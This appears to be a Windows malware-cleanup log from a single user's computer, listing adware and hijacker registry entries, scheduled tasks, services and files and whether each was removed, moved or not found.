HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoHardwareTab => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoStartMenuSubFolders => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDesktop => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\probabaly => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\probabalyprobabaly => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\formally => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\formallyformally => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\7E2GIGOFIW => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\kelling => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\const => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ProxyGate => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\DP53A0YCAS => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\slisdo => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\8SI36M2PFP => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\YPCXU7XLWZ => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Q4M50GL1YU => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\NowUSeeIt Player => value not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Interstatnogui => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DisableCMD => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\NoDispAppearancePage => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\NoDispBackgroundPage => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\NoDispSettingsPage => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewOnDrive => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRun => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRunOnce => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRun => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRunOnce => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewContextMenu => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoShellSearchButton => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFile => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideClock => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayContextMenu => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayItemsDisplay => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetFolders => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDevMgrUpdate => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetTaskbar => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDeletePrinter => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDFSTab => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoChangeStartMenu => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogoff => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoWindowsUpdate => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoEncryptOnMove => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRunasInstallPrompt => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoResolveSearch => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSaveSettings => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoHardwareTab => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoStartMenuSubFolders => value removed successfully
C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\misprision.lnk => moved successfully
C:\Program Files (x86)\Ovals\fluctuations.exe => not found.
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B2155548-F7E4-4313-ACE1-89C26E550F10}" => key removed successfully
HKCR\CLSID\{B2155548-F7E4-4313-ACE1-89C26E550F10} => key not found. 
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91}" => key removed successfully
HKCR\CLSID\{CD01B6C4-A7DB-43CF-B6B5-9E5E0419DA91} => key not found. 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} => key not found. 
HKCR\CLSID\{9211B66D-AA1B-4BD0-bF35-65E6C6E5F23F} => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}" => key removed successfully
"HKCR\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF}" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9" => key removed successfully
Chrome HomePage => removed successfully
Chrome StartupUrls => removed successfully
Chrome DefaultSearchURL => removed successfully
Chrome DefaultSearchKeyword => removed successfully
Chrome DefaultSuggestURL => removed successfully
66d2d577efd779c3e9f6f6c2faf74956 => service not found.
Cegoe => service removed successfully
Ilaaugca => service removed successfully
KarxMhfonki => service not found.
srcsrv => service removed successfully
UnfugitiveA => service not found.
WindowService => service not found.
CHNGTSvc => service not found.
"c:\exervice.exe" => not found.
gupdate => service removed successfully
gupdatem => service removed successfully
ibtsiva => service removed successfully
meseboje => service not found.
979804fd5c15500d838ae68596384f64 => service not found.
cherimoya => Unable to stop service.
cherimoya => service removed successfully
"C:\WINDOWS\system32\drivers\979804fd5c15500d838ae68596384f64.sys" => not found.
C:\WINDOWS\System32\drivers\cherimoya.sys => moved successfully
SMUpdd => Unable to stop service.
SMUpdd => service removed successfully
"C:\Users\Robert G\AppData\Local\E5AD75FC-1482845765-9D97-579A-C454442718AE" => not found.
"C:\Program Files\Jidd" => not found.
C:\ProgramData\smp2.exe => moved successfully
C:\WINDOWS\rsrcs.dll => moved successfully
C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => moved successfully
C:\WINDOWS\System32\Tasks\SMW_P => moved successfully
C:\WINDOWS\system32\BITBBD7.tmp => moved successfully
"C:\Users\Robert G\AppData\Roaming\JucdiJhnoz" => not found.
C:\Users\Robert G\AppData\LocalLow\Company => moved successfully
C:\Users\Robert G\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} => moved successfully
C:\Users\Robert G\AppData\Local\Tempfolder => moved successfully
C:\Users\Robert G\AppData\Local\CrashRpt => moved successfully
C:\uninst => moved successfully
"C:\ProgramData\SearchModule" => not found.
"C:\Program Files\JiddUn" => not found.
"C:\Program Files\Common Files\Noobzo" => not found.
C:\ProgramData\d4b1e343-7d03-0 => moved successfully
"C:\WINDOWS\System32\Tasks\System Healer Task" => not found.
"C:\WINDOWS\System32\Tasks\System HealerPeriod" => not found.
"C:\WINDOWS\System32\Tasks\System HealerStartUp" => not found.
"C:\Users\Public\Desktop\Launch System Healer.lnk" => not found.
"C:\WINDOWS\Tasks\System HealerStartUp.job" => not found.
"C:\WINDOWS\Tasks\System HealerPeriod.job" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer" => not found.
C:\ProgramData\d4b1e343-2e47-1 => moved successfully
"C:\Program Files (x86)\SystemHealer" => not found.
C:\xpack1221_US.1482324322.exe => moved successfully
C:\Program Files (x86)\SoftUpgrade => moved successfully
C:\WINDOWS\SysWOW64\SendRequest Error => moved successfully
C:\WINDOWS\system32\SSL => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer" => not found.
"C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956" => not found.
"C:\Users\Public\Desktop\KNCTR.lnk" => not found.
C:\Users\Robert G\AppData\Local\NowUSeeItPlayer => moved successfully
C:\Users\Robert G\AppData\Local\Chromium => moved successfully
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KNCTR" => not found.
"C:\Program Files (x86)\NowUSeeItPlayer" => not found.
"C:\Program Files (x86)\Itibiti Soft Phone" => not found.
"C:\Program Files (x86)\CleanBrowser" => not found.
"C:\Users\Robert G\AppData\Local\E5AD75FC-1482844048-9D97-579A-C454442718AE" => not found.
C:\Users\Robert G\AppData\Local\slisdo.dll => moved successfully
C:\Users\Robert G\AppData\Local\uninstallro.exe => moved successfully
"C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2" => not found.
"C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job" => not found.
C:\WINDOWS\system32\BITDFC5.tmp => moved successfully
"C:\Users\Robert G\AppData\Roaming\ProxyGate" => not found.
"C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnonymizerGadget" => not found.
"C:\Program Files\1OZOH9DOKF" => not found.
"C:\Program Files\0DA5GV0SMZ" => not found.
"C:\Program Files (x86)\BestCleaner" => not found.
"C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock" => not found.
"C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job" => not found.
C:\ProgramData\ntuser.pol => moved successfully
"C:\Program Files (x86)\Youtube AdBlock" => not found.
C:\Users\Robert G\Downloads\Unconfirmed 89628.crdownload => moved successfully
C:\WINDOWS\System32\Tasks\73699857 => moved successfully
C:\WINDOWS\System32\Tasks\k73699857 => moved successfully
C:\WINDOWS\System32\Tasks\18170115 => moved successfully
C:\WINDOWS\System32\Tasks\60353394 => moved successfully
C:\WINDOWS\System32\Tasks\ga7369985773699857 => moved successfully
C:\WINDOWS\System32\Tasks\gak73699857k73699857 => moved successfully
C:\WINDOWS\System32\Tasks\ga1817011518170115 => moved successfully
C:\WINDOWS\System32\Tasks\ga6035339460353394 => moved successfully
"C:\Program Files (x86)\Ovals" => not found.
"C:\Program Files (x86)\mem" => not found.
C:\Program Files (x86)\Disenfranchise => moved successfully
"C:\Users\Robert G\AppData\Roaming\ASPackage" => not found.
"C:\Program Files\AE5AV44CD6" => not found.
C:\Program Files (x86)\knockdowns => moved successfully
"C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE" => not found.
"C:\Users\Robert G\AppData\Roaming\AGData" => not found.
C:\WINDOWS\System32\Tasks\src_srv => moved successfully
"C:\WINDOWS\System32\Tasks\AGProxyCheck" => not found.
"C:\Users\Robert G\AppData\Roaming\src_srv" => not found.
"C:\Program Files (x86)\AnonymizerGadget" => not found.
"C:\Program Files (x86)\Unfugitivepocson" => not found.
"C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B}" => not found.
"C:\WINDOWS\System32\Tasks\One System Care Task" => not found.
"C:\WINDOWS\System32\Tasks\One System Care Monitor" => not found.
"C:\Users\Public\Desktop\Launch One System Care.lnk" => not found.
"C:\Users\Robert G\AppData\Roaming\One System Care" => not found.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care" => not found.
C:\ProgramData\1a467d37-72a5-1 => moved successfully
C:\ProgramData\1a467d37-42f7-0 => moved successfully
"C:\Program Files (x86)\OneSystemCare" => not found.
C:\Users\Robert G\AppData\Local\fluctuations.exe => moved successfully
"C:\exervice.exe" => not found.
C:\WINDOWS\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe => moved successfully
"C:\WINDOWS\system32\Drivers\979804fd5c15500d838ae68596384f64.sys" => not found.
C:\Users\Robert G\AppData\Local\328ac946-536c-4e44-8483-c0f65d99bbad.dat => moved successfully
C:\Users\Robert G\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat => moved successfully
C:\Users\Robert G\AppData\Local\9483d08e-1f72-4d13-b956-5e490aa0f581.dat => moved successfully
C:\Users\Robert G\AppData\Local\b62f5060-8250-438a-a930-35c70e952a02.dat => moved successfully
"C:\Users\Robert G\AppData\Local\fluctuations.exe" => not found.
"C:\Users\Robert G\AppData\Local\slisdo.dll" => not found.
"C:\Users\Robert G\AppData\Local\uninstallro.exe" => not found.
"C:\ProgramData\smp2.exe" => not found.
C:\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\9S1ETRV3OH.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\sdf6733.exe => moved successfully
C:\Users\Robert G\AppData\Local\Temp\W66KQ7BR7K.exe => moved successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}" => key removed successfully
"HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A6D162B-2271-438A-9015-FDF86E38E3A1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A6D162B-2271-438A-9015-FDF86E38E3A1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0B0C6F63-0BD1-498A-9527-397F7F32D262}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0B0C6F63-0BD1-498A-9527-397F7F32D262}" => key removed successfully
C:\WINDOWS\System32\Tasks\gak73699857k73699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gak73699857k73699857" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11643EA6-43A5-4B26-BCA2-B79C17E2627D} => key not found. 
C:\WINDOWS\System32\Tasks\System HealerStartUp => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System HealerStartUp => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{136AC49D-1185-4DAF-9EED-4010A2D37876}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{136AC49D-1185-4DAF-9EED-4010A2D37876}" => key removed successfully
C:\WINDOWS\System32\Tasks\src_srv => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\src_srv" => key removed successfully
"C:\Program Files (x86)\knockdowns" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1990B26F-6ADF-4BD8-BA6F-799C43204F26}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1990B26F-6ADF-4BD8-BA6F-799C43204F26}" => key removed successfully
C:\WINDOWS\System32\Tasks\18170115 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\18170115" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1CCBFDDC-4FED-4859-9EA1-176E35894E0A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1CCBFDDC-4FED-4859-9EA1-176E35894E0A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1E7810AB-4461-4BAB-A923-725FF0121E8B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E7810AB-4461-4BAB-A923-725FF0121E8B}" => key removed successfully
C:\WINDOWS\System32\Tasks\73699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\73699857" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{20A9A40C-98B8-4A9E-9EF4-34A0EB5D2C67} => key not found. 
C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update Service for Youtube AdBlock => key not found. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{335F0AFA-8CF9-409A-931C-B15A49778819} => key not found. 
C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2 => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Update Service for Youtube AdBlock2 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E463819-FB04-48C1-ACDA-F4F4D23C5466}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E463819-FB04-48C1-ACDA-F4F4D23C5466}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A}" => key removed successfully
C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5C8969CF-AF98-4F0F-A7DD-B1B9C5CC10B2} => key not found. 
C:\WINDOWS\System32\Tasks\System Healer Task => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\System Healer Task => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5D326864-1C1B-4B0C-98E4-8975183EBD11}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5D326864-1C1B-4B0C-98E4-8975183EBD11}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-3079306625-983104223-3348847558-1001" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{69CE572E-9923-4159-A330-DB1D3C2631A8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69CE572E-9923-4159-A330-DB1D3C2631A8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565}" => key removed successfully
C:\WINDOWS\System32\Tasks\60353394 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\60353394" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7115A4DA-439D-4050-9AEF-FD2E2E5A752E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7115A4DA-439D-4050-9AEF-FD2E2E5A752E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7B8662A0-9355-4D8A-8BFD-BEAF35343CD1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7B8662A0-9355-4D8A-8BFD-BEAF35343CD1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{85384654-A986-4FB7-A8DA-D7761EDA3149}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{85384654-A986-4FB7-A8DA-D7761EDA3149}" => key removed successfully
C:\WINDOWS\System32\Tasks\k73699857 => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\k73699857" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{965C4FE9-DA8F-4232-8D6F-D709676DEF24}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{965C4FE9-DA8F-4232-8D6F-D709676DEF24}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{99C8DB32-949A-499C-B5D9-6042D048950D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{99C8DB32-949A-499C-B5D9-6042D048950D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9FFCB734-D79F-4764-8B63-4F06330E3F45} => key not found. 
C:\WINDOWS\System32\Tasks\One System Care Monitor => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\One System Care Monitor => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A06CEAA3-C663-4DD1-BE93-23D8A41E521F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A06CEAA3-C663-4DD1-BE93-23D8A41E521F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A18C8BED-9923-4C65-B78D-B7C168B06955}" => key removed successfully
